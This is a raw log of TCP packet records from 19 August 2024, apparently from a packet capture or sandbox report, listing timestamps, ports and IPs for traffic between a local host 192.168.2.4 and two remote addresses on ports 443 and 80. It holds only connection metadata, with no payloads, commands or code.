Aug 19, 2024 09:28:26.465796947 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.465842962 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.465862989 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.465874910 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.465888023 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.465907097 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.465924025 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.466439962 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.466500998 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.466515064 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.466527939 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.466571093 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.466588020 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.466785908 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.466810942 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.466829062 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.466857910 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.466867924 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.466892004 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.466911077 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.467252970 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.467408895 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.467464924 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.467492104 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.467502117 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.467521906 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.467540026 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.467684031 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.467719078 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.467763901 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.467787027 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.467797041 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.467812061 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.467833042 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.468317032 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.468358994 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.468380928 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.468391895 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.468409061 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.468426943 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.468609095 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.468637943 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.468681097 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.468704939 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.468714952 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.468729019 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.468758106 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.468888044 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.468950987 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.469058037 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.469115019 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.469363928 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.469408989 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.469424009 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.469435930 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.469465017 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.469476938 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.470026970 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.470155954 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.470199108 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.470220089 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.470231056 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.470247030 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.470261097 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.472426891 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.472476006 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.472502947 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.472539902 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.472547054 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.472559929 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.472578049 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.472938061 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.472956896 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.472995043 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.473006010 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.473022938 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.473040104 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.473310947 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.473332882 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.473345995 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.473368883 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.473375082 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.473397017 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.473407030 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.474402905 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.474423885 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.474462032 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.474471092 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.474483967 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.474495888 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.474617958 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.474642038 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.474673986 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.474682093 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.474697113 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.474715948 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.474802971 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.474984884 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.475003004 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.475054979 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.475064039 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.475100040 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.475358009 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.475375891 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.475406885 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.475414991 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.475429058 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.475440979 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.475809097 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.475827932 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.475862026 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.475869894 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.475887060 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.475903988 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.476115942 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.476140976 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.476172924 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.476180077 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.476197958 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.476213932 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.476313114 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.476331949 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.476367950 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.476377010 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.476394892 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.476403952 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.476865053 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.476886988 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.476923943 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.476933002 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.476968050 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.477231026 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.477252960 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.477288961 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.477298975 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.477313042 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.477330923 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.477413893 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.477680922 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.477696896 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.477739096 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.477746010 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.477761030 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.477758884 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.477781057 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.477790117 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.477807045 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.477807045 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.477834940 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.477842093 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.477861881 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.477889061 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.478327990 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.478343010 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.478373051 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.478380919 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.478395939 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.478416920 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.478761911 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.478777885 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.478812933 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.478821039 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.478837013 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.478856087 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.479196072 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.479212999 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.479254007 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.479260921 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.479285002 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.479286909 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.479305983 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.479307890 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.479319096 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.479331017 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.479358912 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.479379892 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.479768991 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.479783058 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.479816914 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.479832888 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.479846954 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.479863882 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.480269909 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.480288982 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.480320930 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.480330944 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.480344057 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.480361938 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.480448961 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.480469942 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.480499983 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.480508089 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.480526924 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.480536938 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.480552912 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.480568886 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.480603933 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.480612040 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.480628967 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.480645895 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.481265068 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.481281996 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.481322050 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.481331110 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.481344938 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.481360912 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.481650114 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.481671095 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.481707096 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.481714010 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.481730938 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.481745005 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.481878042 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.481903076 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.481936932 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.481945038 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.481966972 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.481978893 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.482609034 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.482629061 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.482681990 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.482681036 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.482692957 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.482724905 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.482732058 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.482755899 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.482762098 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.482779026 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.482793093 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.483084917 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.483272076 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.483288050 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.483331919 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.483340025 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.483360052 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.483376026 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.483433962 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.483452082 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.483489037 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.483495951 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.483513117 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.483526945 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.484074116 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.484090090 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.484137058 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.484146118 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.484181881 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.484194994 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.484211922 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.484242916 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.484251022 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.484273911 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.484282970 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.484919071 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.484935045 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.484968901 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.484976053 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.484996080 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.485009909 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.485081911 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.485101938 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.485138893 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.485146999 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.485171080 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.485171080 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.485475063 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.485492945 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.485533953 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.485541105 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.485562086 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.485570908 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.485706091 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.485723019 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.485764027 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.485770941 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.485788107 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.485797882 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.486044884 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.486062050 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.486116886 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.486124039 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.486155033 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.486172915 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.486186028 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.486206055 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.486252069 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.486259937 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.486301899 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.486479998 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.486496925 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.486532927 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.486540079 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.486558914 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.486567974 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.486788034 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.486809969 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.486841917 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.486849070 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.486881971 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.486901999 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.486921072 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.499063015 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.517385960 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.517411947 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.517426014 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.517436981 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.647787094 CEST	49751	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:26.653779984 CEST	80	49751	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:26.653852940 CEST	49751	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:26.654015064 CEST	49751	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:26.654037952 CEST	49751	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:26.659312010 CEST	80	49751	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:26.659440041 CEST	80	49751	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:27.744632006 CEST	80	49751	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:27.745006084 CEST	80	49751	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:27.745095015 CEST	49751	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:27.748528004 CEST	49751	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:27.753637075 CEST	80	49751	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:27.818416119 CEST	49752	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:27.823534966 CEST	80	49752	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:27.823649883 CEST	49752	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:27.825930119 CEST	49752	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:27.825963020 CEST	49752	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:27.830949068 CEST	80	49752	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:27.830991030 CEST	80	49752	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:28.890353918 CEST	80	49752	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:28.890588999 CEST	80	49752	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:28.890691996 CEST	49752	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:28.890786886 CEST	49752	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:28.893846035 CEST	49753	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:28.895632982 CEST	80	49752	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:28.898694038 CEST	80	49753	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:28.898768902 CEST	49753	80	192.168.2.4	189.163.89.217
